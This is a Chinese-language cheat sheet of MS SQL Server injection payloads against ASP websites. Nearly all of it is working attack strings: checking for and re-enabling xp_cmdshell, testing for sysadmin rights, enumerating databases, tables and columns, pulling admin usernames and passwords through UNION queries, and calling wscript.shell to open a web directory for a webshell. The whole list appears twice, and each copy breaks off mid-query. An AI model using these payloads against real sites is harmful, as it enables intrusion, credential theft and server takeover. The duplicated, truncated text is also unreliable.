非常经典的Ms Sql注射资料
;master.dbo.sysobjects where xtype = ''X'' AND name = ''xp_cmdshell'')
;EXEC master.dbo.sp_addextendedproc ''xp_cmdshell'', ''xplog70.dll''
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=''x''%20and%20name=''xp_cmdshell'')
and 1=(select IS_SRVROLEMEMBER(''sysadmin'')) 判断sa权限是否
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:
declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL,'' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"''
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL,'' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse''
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9. 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'') 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'' and name not in (''Admin'')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=''U'' and name=''admin''
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(''id'',)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union语句到处风靡啊,access也好用
暴库特殊技巧::%5c=''\'' 或者把/和\ 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.s
;EXEC master.dbo.sp_addextendedproc ''xp_cmdshell'', ''xplog70.dll''
1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=''x''%20and%20name=''xp_cmdshell'')
and 1=(select IS_SRVROLEMEMBER(''sysadmin'')) 判断sa权限是否
and 0<>(select top 1 paths from newtable)-- 暴库大法
and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到库名(从1到5都是系统的id,6以上才可以判断)
创建一个虚拟目录E盘:
declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL,'' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认 Web 站点" -v "e","e:\"''
访问属性:(配合写入一个webshell)
declare @o int exec sp_oacreate ''wscript.shell'', @o out exec sp_oamethod @o, ''run'', NULL,'' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse''
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9. 得到更多的数据库名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'') 暴到一个表 假设为 admin
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=''U'' and name not in (''Admin'')) 来得到其他的表。
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=''U'' and name=''admin''
and uid>(str(id))) 暴到UID的数值假设为18779569 uid=id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一个admin的一个字段,假设为 user_id
and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in
(''id'',)) 来暴出其他的字段
and 0<(select user_id from BBS.dbo.admin where username>1) 可以得到用户名
依次可以得到密码。。。。。假设存在user_id username ,password 等字段
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(union语句到处风靡啊,access也好用
暴库特殊技巧::%5c=''\'' 或者把/和\ 修改%5提交
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<>(select top 1 name from bbs.dbo.s